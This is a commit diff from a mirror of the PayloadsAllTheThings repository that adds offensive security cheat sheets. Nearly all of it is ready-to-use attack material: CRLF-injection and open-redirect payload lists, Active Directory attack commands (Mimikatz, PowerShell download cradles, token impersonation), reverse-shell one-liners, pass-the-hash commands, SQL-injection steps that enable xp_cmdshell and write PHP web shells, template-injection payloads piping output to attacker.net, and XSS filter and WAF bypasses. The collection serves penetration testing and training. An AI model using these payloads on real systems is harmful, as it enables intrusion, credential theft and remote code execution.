ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

SQLmap tips + Active Directory attacks + SQLite injections

Browse Source
This commit is contained in:
Swissky 2018-03-12 09:17:31 +01:00
parent 70f38d5678
commit 30019235f8
13 changed files with 492 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
CRLF injection/crlfinjection.txt Normal file
View File

@ -0,0 +1,17 @@
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

88
Methodology and Resources/Active Directory Attack.md Normal file
View File

@ -0,0 +1,88 @@
# Active Directory Attacks
## Most common paths to AD compromise
* MS14-068
* MS17-010 (Eternal Blue - Local Admin)
```c
nmap -Pn -p445openmax-hostgroup 3script smb-vuln-ms17010 <ip_netblock>
```
* Unconstrained Delegation (incl. pass-the-ticket)
* OverPass-the-Hash (Making the most of NTLM password hashes)
* Pivoting with Local Admin & Passwords in SYSVOL
* Dangerous Built-in Groups Usage
* Dumping AD Domain Credentials
* Golden Tickets
* Kerberoast
* Silver Tickets
* Trust Tickets
## Tools
* [Impacket](https://github.com/CoreSecurity/impacket)
* Responder
* Mimikatz
* [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound
* RottenPotato
## Mimikatz
```
load mimikatz
mimikatz_command -f sekurlsa::logonPasswords full
```
## PowerSploit
```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
## PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
getuid
getprivs
use incognito
list\_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate\_token "NT AUTHORITY\SYSTEM"
```
```
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
```
## PrivEsc - MS14-068
```
Exploit Python : https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
```
Powershell:
https://www.exploit-db.com/exploits/39719/
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
Binary exe : https://github.com/Meatballs1/ms16-032
Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
```
## Kerberoast
```
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/
```
## Thanks to
* [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)

13
Methodology and Resources/Linux - Reverse Shell Cheatsheet.md → Methodology and Resources/Reverse Shell Cheatsheet.md
View File

@ -72,6 +72,10 @@ Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```
Java Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
lua: os.execute('/bin/sh') lua: os.execute('/bin/sh')
``` ```
Access shortcuts, su, nano and autocomplete in a partially tty shell
```
ctrl+z
stty raw -echo
fg
```
/!\ OhMyZSH might break this trick
(From within vi) (From within vi)
``` ```
:!bash :!bash
@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
* [Spawning a TTY Shell](http://netsec.ws/?p=337) * [Spawning a TTY Shell](http://netsec.ws/?p=337)
* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)

14
Methodology and Resources/Windows - Using credentials.md
View File

@ -12,6 +12,7 @@ creds
``` ```
## Metasploit - Psexec ## Metasploit - Psexec
Note: the password can be replaced by a hash to execute a `pass the hash` attack.
```c ```c
use exploit/windows/smb/psexec use exploit/windows/smb/psexec
set RHOST 10.2.0.3 set RHOST 10.2.0.3
@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
``` ```
## Crackmapexec (Pass The Hash)
```
cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
```
## Winexe (Integrated to Kali) ## Winexe (Integrated to Kali)
```python ```python
winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
``` ```
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
``` ```
or with psexec(sysinternals)
```
psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
```
## Netuse (Windows) ## Netuse (Windows)
``` ```
@ -69,6 +79,8 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
``` ```
## Thanks ## Thanks
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)

67
Open redirect/openredirects.txt Normal file
View File

@ -0,0 +1,67 @@
/%09/example.com
/%2f%2fexample.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google%00.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com

23
Remote commands execution/README.md
View File

@ -67,6 +67,29 @@ Commands execution with a line return
something%0Acat%20/etc/passwd something%0Acat%20/etc/passwd
``` ```
Bypass blacklisted word with single quote
```
w'h'o'am'i
```
Bypass blacklisted word with double quote
```
w"h"o"am"i
```
Bypass blacklisted word with $@
```
who$@ami
```
Bypass zsh/bash/sh blacklist
```
echo $0
-> /usr/bin/zsh
echo whoami|$0
```
## Time based data exfiltration ## Time based data exfiltration
Extracting data : char by char Extracting data : char by char
``` ```

80
SQL injection/MSSQL Injection.md Normal file
View File

@ -0,0 +1,80 @@
# MSSQL Injection
## MSSQL version
```
SELECT @@version
```
## MSSQL database name
```
SELECT DB_NAME()
```
## MSSQL List Databases
```
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
```
## MSSQL List Column
```
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = mytable); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
```
## MSSQL List Tables
```
SELECT name FROM master..sysobjects WHERE xtype = U; — use xtype = V for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = U;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=sometable; — list colum names and types for master..sometable
```
## MSSQL User Password
```
MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
MSSQL 2005
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + - + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```
## MSSQL Error based
```
For integer inputs : convert(int,@@version)
For string inputs : ' + convert(int,@@version) + '
```
## MSSQL Time based
```
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--
```
## MSSQL Command execution
```
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
```
If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
```
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
```
## MSSQL Make user DBA (DB admin)
```
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## Thanks to
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)

18
SQL injection/README.md
View File

@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
``` ```
Shell
```
SQL Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
Using suffix to tamper the injection
```
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
General tamper option and tamper's list General tamper option and tamper's list
``` ```
@ -338,3 +354,5 @@ mysql> mysql> select version();
* Second Order: * Second Order:
- [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/) - [Analyzing CVE-2018-6376 Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
- [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/) - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
* Sqlmap:
- [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)

10
SQL injection/SQLite Injection.md
View File

@ -1,5 +1,9 @@
# SQLite Injection # SQLite Injection
## SQLite version
```
select sqlite_version();
```
## Integer/String based - Extract table name ## Integer/String based - Extract table name
``` ```
@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
## Remote Command Execution using SQLite command - Attach Database ## Remote Command Execution using SQLite command - Attach Database
``` ```
ATTACH DATABASE /var/www/lol.php AS lol; ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text); CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES (<?system($_GET[cmd]); ?>);-- INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--
``` ```
## Remote Command Execution using SQLite command - Load_extension ## Remote Command Execution using SQLite command - Load_extension
@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
Note: By default this component is disabled Note: By default this component is disabled
## Thanks to ## Thanks to
[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf) [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)

9
SSRF injection/README.md
View File

@ -90,6 +90,13 @@ Bypass using rare address
http://0/ http://0/
``` ```
Bypass using bash variables (curl only)
```
curl -v "http://evil$google.com"
$google = ""
```
Bypass using tricks combination Bypass using tricks combination
``` ```
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@ -108,6 +115,7 @@ List:
## SSRF via URL Scheme ## SSRF via URL Scheme
Dict:// Dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
``` ```
@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)

110
Server Side Template injections/README.md
View File

@ -1,47 +1,127 @@
# Templates Injections # Templates Injections
Template injection allows an attacker to include template code into an existant (or not) template. > Template injection allows an attacker to include template code into an existant (or not) template.
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
e.g:
```
./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
```
## Ruby ## Ruby
#### Basic injection ### Basic injection
```python ```python
<%= 7 * 7 %> <%= 7 * 7 %>
``` ```
#### Retrieve /etc/passwd ### Retrieve /etc/passwd
```python ```python
<%= File.open('/etc/passwd').read %> <%= File.open('/etc/passwd').read %>
``` ```
## Java ## Java
#### Basic injection ### Basic injection
```java ```java
${{7*7}} ${{7*7}}
``` ```
#### Retrieve the systems environment variables. ### Retrieve the systems environment variables.
```java ```java
${T(java.lang.System).getenv()} ${T(java.lang.System).getenv()}
``` ```
#### Retrieve /etc/passwd ### Retrieve /etc/passwd
```java ```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
``` ```
## Twig
### Basic injection
```python
{{7*7}}
{{7*'7'}} would result in 49
```
### Template format
```python
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
);
$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
);
```
### Code execution
```python
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
```
## Smarty
```python
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
```
## Freemarker
Default functionality.
```python
<#assign
ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
```
## Jade / Codepen
```python
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
## Velocity
```python
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
## Mako
```python
<%
import os
x=os.popen('id').read()
%>
${x}
```
## Jinja2 ## Jinja2
[Official website](http://jinja.pocoo.org/) [Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
#### Basic injection
### Basic injection
```python ```python
{{4*4}}[[5*5]] {{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
``` ```
Jinja2 is used by Python Web Frameworks such as Django or Flask. Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application. The above injections have been tested on Flask application.
#### Template format ### Template format
```python ```python
{% extends "layout.html" %} {% extends "layout.html" %}
{% block body %} {% block body %}
@ -54,12 +134,12 @@ The above injections have been tested on Flask application.
``` ```
#### Dump all used classes ### Dump all used classes
```python ```python
{{ ''.__class__.__mro__[2].__subclasses__() }} {{ ''.__class__.__mro__[2].__subclasses__() }}
``` ```
#### Dump all config variables ### Dump all config variables
```python ```python
{% for key, value in config.iteritems() %} {% for key, value in config.iteritems() %}
<dt>{{ key|e }}</dt> <dt>{{ key|e }}</dt>
@ -67,18 +147,18 @@ The above injections have been tested on Flask application.
{% endfor %} {% endfor %}
``` ```
#### Read remote file ### Read remote file
```python ```python
# ''.__class__.__mro__[2].__subclasses__()[40] = File class # ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
``` ```
#### Write into remote file ### Write into remote file
```python ```python
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
``` ```
#### Remote Code Execution via reverse shell ### Remote Code Execution via reverse shell
Listen for connexion Listen for connexion
``` ```
nv -lnvp 8000 nv -lnvp 8000
@ -94,5 +174,5 @@ Inject this template
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
#### Training * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
[https://w3challs.com/](https://w3challs.com/) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)

14
XSS injection/Files/XML XSS.xml
View File

@ -2,5 +2,17 @@
<head></head> <head></head>
<body> <body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body> </body>
</html> </html>

54
XSS injection/README.md
View File

@ -71,6 +71,12 @@ XSS for HTML5
<marquee onstart=alert(1)> <marquee onstart=alert(1)>
``` ```
XSS using script tag (external payload)
```
<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)
```
XSS in META tag XSS in META tag
``` ```
@ -147,7 +153,15 @@ XSS with vbscript: only IE
vbscript:msgbox("XSS") vbscript:msgbox("XSS")
``` ```
## XSS in files ## XSS in files
XSS in XML ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
```
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
```
XSS in XML
``` ```
<html> <html>
<head></head> <head></head>
@ -432,6 +446,17 @@ Bypass case sensitive
<sCrIpt>alert(1)</ScRipt> <sCrIpt>alert(1)</ScRipt>
``` ```
Bypass tag blacklist
```
<script x>
<script x>alert('XSS')<script y>
```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```
<img src='1' onerror='alert(0)' <
```
Bypass quotes for string Bypass quotes for string
``` ```
String.fromCharCode(88,83,83) String.fromCharCode(88,83,83)
@ -486,10 +511,6 @@ Bypass space filter with "/" - IE/Firefox/Chrome/Safari
<img/src='1'/onerror=alert(0)> <img/src='1'/onerror=alert(0)>
``` ```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```
<img src='1' onerror='alert(0)' <
```
Bypass document blacklist Bypass document blacklist
``` ```
@ -503,6 +524,7 @@ foo="text </script><script>alert(1)</script>";
</script> </script>
``` ```
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
``` ```
window['alert'](0) window['alert'](0)
@ -566,6 +588,22 @@ Bypass ';' using another character
'te' instanceof alert('instanceof') instanceof 'xt'; 'te' instanceof alert('instanceof') instanceof 'xt';
``` ```
Bypass using HTML encoding
```
%26%2397;lert(1)
```
Bypass using Katakana (https://github.com/aemkei/katakana.js)
```
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
Bypass using Octal encoding
```
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
```
Bypass using Unicode Bypass using Unicode
``` ```
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
@ -672,6 +710,12 @@ Exotic payloads
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
``` ```
## Incapsula WAF Bypass - 8th march
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
## More fun ? ## More fun ?
This section will be used for the "fun/interesting/useless" stuff. This section will be used for the "fun/interesting/useless" stuff.